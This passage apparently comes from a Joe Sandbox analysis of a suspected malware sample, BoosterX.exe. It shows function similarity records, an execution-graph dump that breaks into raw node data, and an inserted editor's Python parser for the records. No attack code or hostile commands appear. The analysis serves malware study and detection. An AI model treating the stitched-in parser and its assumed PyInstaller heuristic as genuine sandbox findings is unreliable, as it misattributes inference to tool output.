                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF6C036E8DB,?,?,?,00007FF6C03645FA,?,?,?), ref: 00007FF6C036E9EA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastObjectSingleWait
                                                    • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                    • API String ID: 1211598281-2248577382
                                                    • Opcode ID: 54b8b47555da90577a26e8fb1f909d889ddb1753417e6592717e91a991b71306
                                                    • Instruction ID: 58f0fdb94270d8d1d9f3b23afbce4a59710a6db7f0a91d27c570b15ca623dfad
                                                    • Opcode Fuzzy Hash: 54b8b47555da90577a26e8fb1f909d889ddb1753417e6592717e91a991b71306
                                                    • Instruction Fuzzy Hash: 14E09A65E19803B2F600AF25DC465A83211BFA53B6F944331D4BEC17F69F2CA9498705
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: FindHandleModuleResource
                                                    • String ID: RTL
                                                    • API String ID: 3537982541-834975271
                                                    • Opcode ID: e3168a20bccc75ec722704d5b9360ecacf73fabbe3432b4ac0f8e016f3fe19b7
                                                    • Instruction ID: a69cc3b0449034d051f7dba79e62c6b15229b37300bd3b5ed0f5be5523658f18
                                                    • Opcode Fuzzy Hash: e3168a20bccc75ec722704d5b9360ecacf73fabbe3432b4ac0f8e016f3fe19b7
                                                    • Instruction Fuzzy Hash: AED05E91F0960392FF194FB6A84933512506F58B43F485039CC8EC6390EF6CE095C754
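The function records above are the text form of Joe Sandbox's per-function similarity fingerprints: resolved API calls with their call sites, referenced strings with xrefs, the memory-dump provenance, and the Similarity block (API ID, String ID, Opcode ID, Instruction ID and the two fuzzy hashes). As an added example, not Joe Sandbox's own tooling, the Python below parses records in exactly that layout into structured objects, builds an exact-match index on a chosen hash so two reports of the same family can be diffed function by function, and flags strings that point into a PyInstaller `_MEI<digits>` extraction directory (the `BoosterX.exe` path on this page is one). The `_MEI` heuristic and the function names are the editor's assumptions; the sample input is constructed from two records on this page with the "Download File" link residue removed.

```python
"""Parse Joe Sandbox per-function similarity records (the text layout used in this
report) into structured fingerprints.  Added example, not Joe Sandbox tooling."""
import re
from dataclasses import dataclass, field

# Section headers exactly as they appear in the report text.
SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Similarity"}

# "RaiseException.KERNEL32(?,?,...,00007FF6C0381CBE), ref: 00007FF6C0384082"
API_RE = re.compile(r"^(?P<name>\w+)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")
# "C:\...\BoosterX.exe, xrefs: 00007FF6C038C279"   (several xrefs are comma separated)
STRING_RE = re.compile(r"^(?P<text>.*), xrefs: (?P<xrefs>[0-9A-Fa-f]+(?:, [0-9A-Fa-f]+)*)$")
# "Instruction Fuzzy Hash: 2011..."   (a "String ID:" line may carry an empty value)
KV_RE = re.compile(r"^(?P<key>[^:]+):\s*(?P<value>.*)$")


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)        # (api, module, call-site address)
    strings: list = field(default_factory=list)     # (text, [xref addresses])
    snapshot: str = ""                              # IDA plugin snapshot file
    similarity: dict = field(default_factory=dict)  # API ID, Opcode ID, fuzzy hashes, ...


def parse_records(text):
    """One record runs APIs -> Strings -> Memory Dump Source -> Joe Sandbox IDA Plugin
    -> Similarity; the next section header after a Similarity block starts a new one."""
    records, current, section = [], FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            if section == "Similarity" and current.similarity:
                records.append(current)
                current = FunctionRecord()
            section = line
            continue
        if not line.startswith("•"):
            continue                     # page chrome, not part of a record
        body = line[1:].strip()
        if section == "APIs":
            m = API_RE.match(body)
            if m:
                current.apis.append((m["name"], m["module"], m["ref"]))
        elif section == "Strings":
            m = STRING_RE.match(body)
            if m:
                current.strings.append((m["text"], m["xrefs"].split(", ")))
        elif section == "Joe Sandbox IDA Plugin":
            m = KV_RE.match(body)
            if m and m["key"] == "Snapshot File":
                current.snapshot = m["value"]
        elif section == "Similarity":
            m = KV_RE.match(body)
            if m:
                current.similarity[m["key"]] = m["value"]
    if current.similarity:
        records.append(current)
    return records


def index_by_hash(records, key="Instruction Fuzzy Hash"):
    """Exact-match index on one Similarity field, for diffing function sets across reports."""
    return {r.similarity[key]: r for r in records if key in r.similarity}


# Assumed heuristic (not stated by the report): PyInstaller extracts its bundle to a
# %TEMP%\_MEI<digits> directory, so a string pointing there names the unpacked payload.
PYINSTALLER_TMP_RE = re.compile(r"\\_MEI\d+\\", re.IGNORECASE)


def pyinstaller_temp_refs(records):
    """Return (string, xrefs, API ID) for every string that points into a _MEI directory."""
    hits = []
    for rec in records:
        for text, xrefs in rec.strings:
            if PYINSTALLER_TMP_RE.search(text):
                hits.append((text, xrefs, rec.similarity.get("API ID", "")))
    return hits


# Constructed sample: two records copied from this report's function listing.
SAMPLE = r"""
APIs
• RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6C0381CBE), ref: 00007FF6C038403C
• RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6C0381CBE), ref: 00007FF6C0384082
Strings
Memory Dump Source
• Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
Similarity
• API ID: ExceptionFileHeaderRaise
• String ID: csm
• API String ID: 2573137834-1018135373
• Opcode ID: 1d5db736ccfdc40490821f2c69de7fb41a1095ad17331bc3641baf3fc80bbebe
• Instruction Fuzzy Hash: 20114C72608B8292EB208F15E44026AB7A1FB88B95F184272DFCD87B68DF3CD551CB00
APIs
Strings
• C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe, xrefs: 00007FF6C038C279
Memory Dump Source
• Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
Similarity
• API ID: FileModuleName_invalid_parameter_noinfo
• String ID: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe
• API String ID: 3307058713-3092362476
• Opcode ID: a0d8c3237379257ab40db39896a4593fde12318382e3262d4c43878eda6e4b0c
• Instruction Fuzzy Hash: 7841AC32A18A53AAEB15DF21A8401BC7794EF85BD5F548277EA8DC7B85DF3CE4428300
"""
```

Feed it the text of a whole report section (`parse_records(open(path, encoding="utf-8").read())`) rather than the sample, and intersect the keys of `index_by_hash()` from two reports to see which functions the samples share; the Opcode ID and Instruction ID fields are equally usable as the index key, while the "Associated" dump lines are ignored because they repeat the same module-level provenance for every function.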

                                                    Execution Graph

                                                    Execution Coverage:13%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:2000
                                                    Total number of Limit Nodes:27
                                                    execution_graph: nodes carrying a resolved API or library-call annotation, listed as node id(s), address, annotation, in order of appearance in the graph data; unannotated nodes and the edge list are omitted
                                                    • 25483 7ff720b62cec (root node)
                                                    • 25606, 25607 7ff720b630f0 7 API calls 2 library calls
                                                    • 25487 7ff720b62d08 __scrt_acquire_startup_lock
                                                    • 25498 7ff720b62d68 __scrt_release_startup_lock
                                                    • 25494 7ff720b62e4d abort
                                                    • 25603 7ff720b6bfd0 35 API calls __GSHandlerCheck_EH
                                                    • 25522 7ff720b63253 GetStartupInfoW
                                                    • 25676 7ff720b70a40 35 API calls _snwprintf
                                                    • 25534 7ff720b60724 memcpy_s
                                                    • 25539, 25544, 25584 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls
                                                    • 25537 7ff720b608ee GetCommandLineW
                                                    • 25547, 25548, 25699, 25711, 25716, 25721, 25724, 25726, 25735 7ff720b31fa0 31 API calls
                                                    • 25551 7ff720b60ae8 memcpy_s
                                                    • 25552 7ff720b60b13 SetEnvironmentVariableW GetLocalTime
                                                    • 25559 7ff720b60979 OpenFileMappingW
                                                    • 25566, 25704, 25707, 25723 7ff720b3129c 33 API calls
                                                    • 25561 7ff720b60999 MapViewOfFile
                                                    • 25562 7ff720b60a50 CloseHandle
                                                    • 25564 7ff720b609bf UnmapViewOfFile MapViewOfFile
                                                    • 25881 7ff720b5a110 33 API calls 2 library calls
                                                    • 25882, 25899 7ff720b5fc8c 35 API calls 2 library calls
                                                    • 25575 7ff720b56734 33 API calls
                                                    • 25578 7ff720b60c07 DialogBoxParamW
                                                    • 25588 7ff720b60c66 Sleep
                                                    • 25589 7ff720b60a47 UnmapViewOfFile
                                                    • 25900 7ff720b59ecc 49 API calls 2 library calls
                                                    • 25592 7ff720b60c86 DeleteObject
                                                    • 25594 7ff720b60c9f DeleteObject
                                                    • 25901 7ff720b5fda4 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject
                                                    • 25598 7ff720b60ce0 CloseHandle
                                                    • 25609 7ff720b6279e __scrt_dllmain_crt_thread_attach
                                                    • 25614 7ff720b65120 7 API calls 2 library calls
                                                    • 25626 7ff720b6f318 EnterCriticalSection
                                                    • 25639 7ff720b6293c 34 API calls
                                                    • 25647 7ff720b456a8 2 API calls
                                                    • 25650 7ff720b456be memcpy_s
                                                    • 25656 7ff720b4ead4 GetCurrentProcess GetProcessAffinityMask
                                                    • 25669 7ff720b32018 33 API calls std::_Xinvalid_argument
                                                    • 25665 7ff720b62150 33 API calls
                                                    • 25666 7ff720b313db memcpy_s
                                                    • 25668 7ff720b3197c 31 API calls _invalid_parameter_noinfo_noreturn
                                                    • 25677 7ff720b704f0 48 API calls 5 library calls
                                                    • 25935 7ff720b6b708 39 API calls 2 library calls
                                                    • 25682 7ff720b4dfa2 GetProcAddress
                                                    • 25684 7ff720b4dfcf GetProcAddress
                                                    • 25686, 25693 7ff720b46414 34 API calls
                                                    • 25694 7ff720b4e33f CreateFileW
                                                    • 25695 7ff720b4e46c CloseHandle
                                                    • 25696 7ff720b4e37f SetFilePointer
                                                    • 25698 7ff720b4e398 ReadFile
                                                    • 25944 7ff720b625a4 8 API calls
                                                    • 25706 7ff720b4e4ba CompareStringW
                                                    • 25940 7ff720b47e70 47 API calls
                                                    • 25722 7ff720b45164 9 API calls
                                                    • 25730 7ff720b48050 47 API calls
                                                    • 25731 7ff720b622a0 _handle_error 8 API calls
                                                    • 25732 7ff720b4da14 48 API calls
                                                    • 25734 7ff720b4e6c7 AllocConsole
                                                    • 25755 7ff720b4629c GetCurrentDirectoryW
                                                    • 25738 7ff720b4e6d1 GetCurrentProcessId AttachConsole
                                                    • 25741 7ff720b4aaa0 48 API calls
                                                    • 25943 7ff720b319e0 31 API calls _invalid_parameter_noinfo_noreturn
                                                    • 25748 7ff720b4e6f4 GetStdHandle WriteConsoleW Sleep
FreeConsole 25739->25748 25740 7ff720b4327c 51 API calls 25740->25742 25745 7ff720b4e621 25741->25745 25742->25723 25742->25730 25742->25735 25742->25740 25746 7ff720b4e5b6 25742->25746 25744 7ff720b4e735 ExitProcess 25747 7ff720b4da14 48 API calls 25745->25747 25746->25713 25746->25714 25749 7ff720b4e63f 25747->25749 25748->25737 25750 7ff720b4aaa0 48 API calls 25749->25750 25751 7ff720b4e64a 25750->25751 25941 7ff720b4dba8 33 API calls 25751->25941 25753 7ff720b4e656 25942 7ff720b319e0 31 API calls _invalid_parameter_noinfo_noreturn 25753->25942 25756 7ff720b462c0 25755->25756 25761 7ff720b4634d 25755->25761 25757 7ff720b313a4 33 API calls 25756->25757 25758 7ff720b462db GetCurrentDirectoryW 25757->25758 25759 7ff720b46301 25758->25759 26045 7ff720b320b0 25759->26045 25761->25532 25762 7ff720b4630f 25762->25761 25763 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 25762->25763 25764 7ff720b46369 25763->25764 25766 7ff720b4dd04 25765->25766 25767 7ff720b59401 OleInitialize 25766->25767 25768 7ff720b59427 25767->25768 25769 7ff720b5944d SHGetMalloc 25768->25769 25769->25534 25771 7ff720b599c9 25770->25771 25774 7ff720b599ce memcpy_s 25770->25774 25772 7ff720b31fa0 31 API calls 25771->25772 25772->25774 25773 7ff720b31fa0 31 API calls 25779 7ff720b599fd memcpy_s 25773->25779 25774->25773 25774->25779 25775 7ff720b31fa0 31 API calls 25776 7ff720b59a2c memcpy_s 25775->25776 25777 7ff720b59a5b memcpy_s 25776->25777 25778 7ff720b31fa0 31 API calls 25776->25778 25777->25538 25778->25777 25779->25775 25779->25776 25781 7ff720b312d0 25780->25781 25788 7ff720b3139b 25780->25788 25784 7ff720b312de memcpy_s 25781->25784 25785 7ff720b31338 25781->25785 25786 7ff720b31396 25781->25786 25784->25549 25785->25784 25789 7ff720b62150 33 API calls 25785->25789 26050 7ff720b31f80 33 API calls 3 library calls 25786->26050 26051 7ff720b32004 33 API calls std::_Xinvalid_argument 25788->26051 25789->25784 25791 7ff720b4d05c 33 API calls 25790->25791 25806 7ff720b5ca9f 
memcpy_s 25791->25806 25792 7ff720b5cd0b 25793 7ff720b5cd3e 25792->25793 25796 7ff720b5cd64 25792->25796 25794 7ff720b622a0 _handle_error 8 API calls 25793->25794 25797 7ff720b5cd4f 25794->25797 25795 7ff720b4d05c 33 API calls 25795->25806 25798 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 25796->25798 25797->25556 25799 7ff720b5cd69 25798->25799 26052 7ff720b3704c 47 API calls memcpy_s 25799->26052 25800 7ff720b5cd6f 26053 7ff720b3704c 47 API calls memcpy_s 25800->26053 25803 7ff720b5cd75 25804 7ff720b4babc 102 API calls 25804->25806 25805 7ff720b3129c 33 API calls 25805->25806 25806->25792 25806->25795 25806->25796 25806->25799 25806->25800 25806->25804 25806->25805 25807 7ff720b31fa0 31 API calls 25806->25807 25807->25806 25809 7ff720b313a4 33 API calls 25808->25809 25810 7ff720b46449 25809->25810 25811 7ff720b4644c GetModuleFileNameW 25810->25811 25814 7ff720b4649c 25810->25814 25812 7ff720b46467 25811->25812 25813 7ff720b4649e 25811->25813 25812->25810 25813->25814 25815 7ff720b3129c 33 API calls 25814->25815 25817 7ff720b464c6 25815->25817 25816 7ff720b464fe 25816->25545 25817->25816 25818 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 25817->25818 25819 7ff720b46520 25818->25819 25821 7ff720b43e0d _snwprintf 25820->25821 25822 7ff720b69e70 swprintf 46 API calls 25821->25822 25823 7ff720b43e29 SetEnvironmentVariableW GetModuleHandleW LoadIconW 25822->25823 25824 7ff720b5af94 LoadBitmapW 25823->25824 25825 7ff720b5afbe 25824->25825 25826 7ff720b5afc6 25824->25826 26054 7ff720b585a4 FindResourceExW 25825->26054 25828 7ff720b5afce GetObjectW 25826->25828 25829 7ff720b5afe3 25826->25829 25828->25829 26069 7ff720b5841c 25829->26069 25832 7ff720b5b04e 25843 7ff720b4986c 25832->25843 25833 7ff720b5b01e 26074 7ff720b58484 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25833->26074 25834 7ff720b585a4 11 API calls 25836 7ff720b5b00a 25834->25836 25836->25833 25838 7ff720b5b012 DeleteObject 25836->25838 25837 7ff720b5b027 26075 7ff720b5844c 
25837->26075 25838->25833 25842 7ff720b5b03f DeleteObject 25842->25832 26082 7ff720b4989c 25843->26082 25845 7ff720b4987a 26149 7ff720b4a3fc GetModuleHandleW FindResourceW 25845->26149 25847 7ff720b49882 25847->25568 25849 7ff720b62150 33 API calls 25848->25849 25850 7ff720b5677a 25849->25850 25850->25575 25852 7ff720b59481 25851->25852 25853 7ff720b5948a OleUninitialize 25852->25853 25854 7ff720b9e330 25853->25854 26238 7ff720b614d8 25855->26238 25858 7ff720b6190b 25860 7ff720b617e8 DloadReleaseSectionWriteAccess 6 API calls 25858->25860 25859 7ff720b61934 25862 7ff720b619bd LoadLibraryExA 25859->25862 25863 7ff720b61a3d 25859->25863 25864 7ff720b61b05 25859->25864 25865 7ff720b61a29 25859->25865 25861 7ff720b61918 RaiseException 25860->25861 25874 7ff720b61b35 25861->25874 25862->25865 25866 7ff720b619d4 GetLastError 25862->25866 25863->25864 25867 7ff720b61a9b GetProcAddress 25863->25867 26246 7ff720b617e8 25864->26246 25865->25863 25870 7ff720b61a34 FreeLibrary 25865->25870 25868 7ff720b619fe 25866->25868 25869 7ff720b619e9 25866->25869 25867->25864 25873 7ff720b61ab0 GetLastError 25867->25873 25872 7ff720b617e8 DloadReleaseSectionWriteAccess 6 API calls 25868->25872 25869->25865 25869->25868 25870->25863 25875 7ff720b61a0b RaiseException 25872->25875 25876 7ff720b61ac5 25873->25876 25874->25554 25875->25874 25876->25864 25877 7ff720b617e8 DloadReleaseSectionWriteAccess 6 API calls 25876->25877 25878 7ff720b61ae7 RaiseException 25877->25878 25879 7ff720b614d8 _com_raise_error 6 API calls 25878->25879 25880 7ff720b61b01 25879->25880 25880->25864 25881->25573 25882->25579 25884 7ff720b4b9a4 25883->25884 25886 7ff720b4b9f8 25883->25886 25884->25886 25887 7ff720b4b9c4 GetProcAddressForCaller GetProcAddress 25884->25887 25885 7ff720b4ba86 GetCurrentProcessId 25888 7ff720b4ba67 25885->25888 25886->25885 25889 7ff720b4ba2a 25886->25889 25887->25886 25895 7ff720b4babc 25888->25895 25889->25888 26267 7ff720b3b67c 99 API calls _handle_error 25889->26267 25891 
7ff720b4ba52 26268 7ff720b3ba60 99 API calls 3 library calls 25891->26268 25893 7ff720b4ba5a 26269 7ff720b3b674 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 25893->26269 25897 7ff720b4badb 25895->25897 25896 7ff720b4bb17 25896->25586 25897->25896 26270 7ff720b4b928 25897->26270 25899->25576 25900->25590 25901->25598 25903 7ff720b4df70 GetModuleHandleW 25902->25903 25903->25681 25903->25682 25905 7ff720b47dcc 25904->25905 25906 7ff720b47e15 25905->25906 25907 7ff720b47de3 25905->25907 25945 7ff720b3704c 47 API calls memcpy_s 25906->25945 25909 7ff720b3129c 33 API calls 25907->25909 25911 7ff720b47e07 25909->25911 25910 7ff720b47e1a 25911->25710 25913 7ff720b45188 GetVersionExW 25912->25913 25914 7ff720b451bb 25912->25914 25913->25914 25915 7ff720b622a0 _handle_error 8 API calls 25914->25915 25916 7ff720b451e8 25915->25916 25916->25710 25918 7ff720b48065 25917->25918 25946 7ff720b48148 25918->25946 25920 7ff720b4808a 25920->25710 25922 7ff720b432a7 GetFileAttributesW 25921->25922 25923 7ff720b432a4 25921->25923 25924 7ff720b43335 25922->25924 25925 7ff720b432b8 25922->25925 25923->25922 25926 7ff720b622a0 _handle_error 8 API calls 25924->25926 25955 7ff720b469cc 25925->25955 25928 7ff720b43349 25926->25928 25928->25710 25930 7ff720b432fc 25930->25924 25932 7ff720b43359 25930->25932 25931 7ff720b432e3 GetFileAttributesW 25931->25930 25933 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 25932->25933 25934 7ff720b4335e 25933->25934 25935->25690 25938 7ff720b4d08e 25936->25938 25937 7ff720b4d0c2 25937->25709 25938->25937 25939 7ff720b31744 33 API calls 25938->25939 25939->25938 25940->25719 25941->25753 25942->25737 25943->25744 25944->25705 25945->25910 25947 7ff720b482e6 25946->25947 25950 7ff720b4817a 25946->25950 25954 7ff720b3704c 47 API calls memcpy_s 25947->25954 25949 7ff720b482eb 25952 7ff720b48194 memcpy_s 25950->25952 25953 7ff720b45864 33 API calls 2 library calls 25950->25953 25952->25920 25953->25952 25954->25949 25956 
7ff720b46a0b 25955->25956 25957 7ff720b46a04 25955->25957 25960 7ff720b3129c 33 API calls 25956->25960 25958 7ff720b622a0 _handle_error 8 API calls 25957->25958 25959 7ff720b432df 25958->25959 25959->25930 25959->25931 25961 7ff720b46a36 25960->25961 25962 7ff720b46c87 25961->25962 25963 7ff720b46a56 25961->25963 25964 7ff720b4629c 35 API calls 25962->25964 25965 7ff720b46b09 25963->25965 25966 7ff720b46a70 25963->25966 25968 7ff720b46ca6 25964->25968 25993 7ff720b3129c 33 API calls 25965->25993 26027 7ff720b46b04 25965->26027 25992 7ff720b4706b 25966->25992 26028 7ff720b3c0a8 33 API calls 2 library calls 25966->26028 25970 7ff720b46eaf 25968->25970 25972 7ff720b46cdb 25968->25972 25968->26027 25971 7ff720b4708f 25970->25971 26037 7ff720b3c0a8 33 API calls 2 library calls 25970->26037 26043 7ff720b32004 33 API calls std::_Xinvalid_argument 25971->26043 25973 7ff720b4707d 25972->25973 26031 7ff720b3c0a8 33 API calls 2 library calls 25972->26031 26041 7ff720b32004 33 API calls std::_Xinvalid_argument 25973->26041 25974 7ff720b47095 25981 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 25974->25981 25975 7ff720b47071 25980 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 25975->25980 25977 7ff720b46ac3 25990 7ff720b31fa0 31 API calls 25977->25990 25994 7ff720b46ad5 memcpy_s 25977->25994 25988 7ff720b47077 25980->25988 25989 7ff720b4709b 25981->25989 25982 7ff720b47066 25987 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 25982->25987 25983 7ff720b46f16 26038 7ff720b311cc 33 API calls memcpy_s 25983->26038 25985 7ff720b47083 25997 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 25985->25997 25986 7ff720b31fa0 31 API calls 25986->26027 25987->25992 25998 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 25988->25998 26000 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 25989->26000 25990->25994 26040 7ff720b32004 33 API calls std::_Xinvalid_argument 25992->26040 26001 7ff720b46b7e 25993->26001 
25994->25986 25995 7ff720b46f29 26039 7ff720b4576c 33 API calls memcpy_s 25995->26039 26003 7ff720b47089 25997->26003 25998->25973 25999 7ff720b31fa0 31 API calls 26010 7ff720b46db5 25999->26010 26005 7ff720b470a1 26000->26005 26029 7ff720b457e0 33 API calls 26001->26029 26042 7ff720b3704c 47 API calls memcpy_s 26003->26042 26004 7ff720b46d36 memcpy_s 26004->25985 26004->25999 26006 7ff720b46b93 26030 7ff720b3e174 33 API calls 2 library calls 26006->26030 26009 7ff720b31fa0 31 API calls 26012 7ff720b46fac 26009->26012 26013 7ff720b46de1 26010->26013 26032 7ff720b31744 33 API calls 4 library calls 26010->26032 26011 7ff720b46f39 memcpy_s 26011->25989 26011->26009 26014 7ff720b31fa0 31 API calls 26012->26014 26013->26003 26019 7ff720b3129c 33 API calls 26013->26019 26017 7ff720b46fb6 26014->26017 26016 7ff720b31fa0 31 API calls 26021 7ff720b46c2d 26016->26021 26018 7ff720b31fa0 31 API calls 26017->26018 26018->26027 26023 7ff720b46e82 26019->26023 26020 7ff720b46ba9 memcpy_s 26020->25988 26020->26016 26022 7ff720b31fa0 31 API calls 26021->26022 26022->26027 26033 7ff720b32034 26023->26033 26025 7ff720b46e9f 26026 7ff720b31fa0 31 API calls 26025->26026 26026->26027 26027->25957 26027->25974 26027->25975 26027->25982 26028->25977 26029->26006 26030->26020 26031->26004 26032->26013 26034 7ff720b32085 26033->26034 26036 7ff720b32059 memcpy_s 26033->26036 26044 7ff720b315b8 33 API calls 3 library calls 26034->26044 26036->26025 26037->25983 26038->25995 26039->26011 26042->25971 26044->26036 26046 7ff720b320f6 26045->26046 26048 7ff720b320cb memcpy_s 26045->26048 26049 7ff720b31474 33 API calls 3 library calls 26046->26049 26048->25762 26049->26048 26050->25788 26052->25800 26053->25803 26055 7ff720b585cf SizeofResource 26054->26055 26056 7ff720b5871b 26054->26056 26055->26056 26057 7ff720b585e9 LoadResource 26055->26057 26056->25826 26057->26056 26058 7ff720b58602 LockResource 26057->26058 26058->26056 26059 7ff720b58617 GlobalAlloc 26058->26059 26059->26056 26060 
7ff720b58638 GlobalLock 26059->26060 26061 7ff720b5864a memcpy_s 26060->26061 26062 7ff720b58712 GlobalFree 26060->26062 26063 7ff720b58658 CreateStreamOnHGlobal 26061->26063 26062->26056 26064 7ff720b58709 GlobalUnlock 26063->26064 26065 7ff720b58676 GdipAlloc 26063->26065 26064->26062 26066 7ff720b5868b 26065->26066 26066->26064 26067 7ff720b586da GdipCreateHBITMAPFromBitmap 26066->26067 26068 7ff720b586f2 26066->26068 26067->26068 26068->26064 26070 7ff720b5844c 4 API calls 26069->26070 26071 7ff720b5842a 26070->26071 26072 7ff720b58439 26071->26072 26080 7ff720b58484 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26071->26080 26072->25832 26072->25833 26072->25834 26074->25837 26076 7ff720b5845e 26075->26076 26077 7ff720b58463 26075->26077 26081 7ff720b58510 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26076->26081 26079 7ff720b58d74 16 API calls _handle_error 26077->26079 26079->25842 26080->26072 26081->26077 26085 7ff720b498be _snwprintf 26082->26085 26083 7ff720b49933 26203 7ff720b46870 48 API calls 26083->26203 26085->26083 26087 7ff720b49a49 26085->26087 26086 7ff720b31fa0 31 API calls 26088 7ff720b499bd 26086->26088 26087->26088 26091 7ff720b320b0 33 API calls 26087->26091 26151 7ff720b42480 26088->26151 26089 7ff720b4993d memcpy_s 26089->26086 26090 7ff720b4a3ee 26089->26090 26092 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 26090->26092 26091->26088 26094 7ff720b4a3f4 26092->26094 26097 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 26094->26097 26096 7ff720b499e2 26099 7ff720b42004 100 API calls 26096->26099 26100 7ff720b4a3fa 26097->26100 26098 7ff720b49ad7 26169 7ff720b6a3d0 26098->26169 26102 7ff720b499eb 26099->26102 26102->26094 26105 7ff720b49a26 26102->26105 26104 7ff720b49a6d 26104->26098 26109 7ff720b48e18 33 API calls 26104->26109 26107 7ff720b622a0 _handle_error 8 API calls 26105->26107 26106 7ff720b6a3d0 31 API calls 26120 7ff720b49b17 __vcrt_InitializeCriticalSectionEx 26106->26120 26108 7ff720b4a3ce 26107->26108 
26108->25845 26109->26104 26110 7ff720b49c49 26111 7ff720b42a60 101 API calls 26110->26111 26123 7ff720b49d1c 26110->26123 26114 7ff720b49c61 26111->26114 26117 7ff720b42890 104 API calls 26114->26117 26114->26123 26121 7ff720b49c89 26117->26121 26120->26110 26120->26123 26177 7ff720b42b70 26120->26177 26186 7ff720b42890 26120->26186 26191 7ff720b42a60 26120->26191 26121->26123 26143 7ff720b49c97 __vcrt_InitializeCriticalSectionEx 26121->26143 26204 7ff720b50b3c MultiByteToWideChar 26121->26204 26196 7ff720b42004 26123->26196 26124 7ff720b4a1ac 26133 7ff720b4a282 26124->26133 26210 7ff720b6cf10 31 API calls 2 library calls 26124->26210 26126 7ff720b4a117 26126->26124 26207 7ff720b6cf10 31 API calls 2 library calls 26126->26207 26127 7ff720b4a10b 26127->25845 26130 7ff720b4a209 26211 7ff720b6b73c 31 API calls _invalid_parameter_noinfo_noreturn 26130->26211 26131 7ff720b4a362 26134 7ff720b6a3d0 31 API calls 26131->26134 26132 7ff720b4a26e 26132->26133 26212 7ff720b48c90 33 API calls 2 library calls 26132->26212 26133->26131 26135 7ff720b48e18 33 API calls 26133->26135 26137 7ff720b4a38b 26134->26137 26135->26133 26140 7ff720b6a3d0 31 API calls 26137->26140 26139 7ff720b4a12d 26208 7ff720b6b73c 31 API calls _invalid_parameter_noinfo_noreturn 26139->26208 26140->26123 26141 7ff720b4a198 26141->26124 26209 7ff720b48c90 33 API calls 2 library calls 26141->26209 26143->26123 26143->26124 26143->26126 26143->26127 26144 7ff720b4a3e9 26143->26144 26146 7ff720b50ee8 WideCharToMultiByte 26143->26146 26205 7ff720b4aa48 45 API calls _snwprintf 26143->26205 26206 7ff720b6a1f0 31 API calls 2 library calls 26143->26206 26213 7ff720b625a4 8 API calls 26144->26213 